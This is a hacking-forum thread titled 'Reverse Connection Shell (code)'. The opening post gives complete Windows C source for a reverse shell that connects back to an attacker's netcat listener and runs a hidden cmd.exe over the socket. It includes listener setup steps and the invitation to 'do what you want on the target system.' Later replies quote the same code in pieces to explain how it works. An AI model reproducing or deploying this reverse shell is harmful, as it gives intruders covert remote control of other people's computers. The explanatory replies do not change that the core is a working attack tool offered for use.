EvilZone

Hacking and Security => Hacking and Security => : Infinityexists March 17, 2012, 06:53:06 PM

: Reverse Connection Shell (code)
: Infinityexists March 17, 2012, 06:53:06 PM

I've found this somewhere but didn't understand how it works , maybe some of you could help understanding this




Reverse Connection Shell ,



This would be used to connect back to you and spawn a CMD shell on the target's system. Yes you can use the CMD on the target system, that is the whole point.




1. Set Netcat to listen on your system with the Port and IP specified in the example (Change both to your liking): nc -lvvp 1977.


2. When someone runs this RevCon it connects back to you through the Port and IP specified and gives you a CMD shell on their system through Netcat.


3. Do what you want on the target system.

:

#include <winsock2.h>
#pragma comment(lib,"ws2_32")


void main()
{
WSADATA a;
SOCKET b;
STARTUPINFO c;
PROCESS_INFORMATION d;
struct sockaddr_in e;
memset(&e,0,sizeof(e));
memset(&c,0,sizeof(c));
WSAStartup(0x202,&a);                                      //Version: 0x202 = 2.2
b=WSASocket(2,1,6,0,0,0);
e.sin_family=0x2;                                        //0x2 = AF_INET
e.sin_port=ntohs(0x7B9);                                //Port: 0x7B9 = 1977
e.sin_addr.s_addr=inet_addr("127.0.0.1");
connect(b,(struct sockaddr*)&e,sizeof(e));
c.cb=sizeof(c);
c.dwFlags=0x00000100;                                 //0x00000100 = STARTF_USESTDHANDLES
c.hStdInput=c.hStdOutput=c.hStdError=(void*)b;
CreateProcess(0,"cmd",0,0,1,0x08000000,0,0,&c,&d);  //1 = TRUE, 0x08000000 = CREATE_NO_WINDOW
}

: Re: Reverse Connection Shell (code)
: Kulverstukas March 17, 2012, 07:23:57 PM

I think you just answered your own question :P

BTW: Why such big spaces between paragraphs?

: Re: Reverse Connection Shell (code)
: neusbeer March 17, 2012, 07:27:13 PM

: Kulverstukas  March 17, 2012, 07:23:57 PM

I think you just answered your own question :P

BTW: Why such big spaces between paragraphs?

I have the same 'problem'.. I always have to edit again to delete the extra empty spaces.
1 linebreak acts as 2, something to do with unix or win char encoding..

: Re: Reverse Connection Shell (code)
: ca0s March 17, 2012, 11:46:08 PM

What are you asking for? A description of how the code works?
It opens a socket to the desired address (127.0.0.1 in the code). This is the biggest part of the code:

:

WSADATA a;
SOCKET b;
struct sockaddr_in e;
memset(&e,0,sizeof(e));

WSAStartup(0x202,&a);                                      //Version: 0x202 = 2.2
b=WSASocket(2,1,6,0,0,0);
e.sin_family=0x2;                                        //0x2 = AF_INET
e.sin_port=ntohs(0x7B9);                                //Port: 0x7B9 = 1977
e.sin_addr.s_addr=inet_addr("127.0.0.1");
connect(b,(struct sockaddr*)&e,sizeof(e));
The it creates a cmd.exe process with its stdin and stdout handles redirected to that socket.

:

TARTUPINFO c;
PROCESS_INFORMATION d;

memset(&c,0,sizeof(c));

c.cb=sizeof(c);
c.dwFlags=0x00000100;                                 //0x00000100 = STARTF_USESTDHANDLES
c.hStdInput=c.hStdOutput=c.hStdError=(void*)b;
CreateProcess(0,"cmd",0,0,1,0x08000000,0,0,&c,&d);  //1 = TRUE, 0x08000000 = CREATE_NO_WINDOW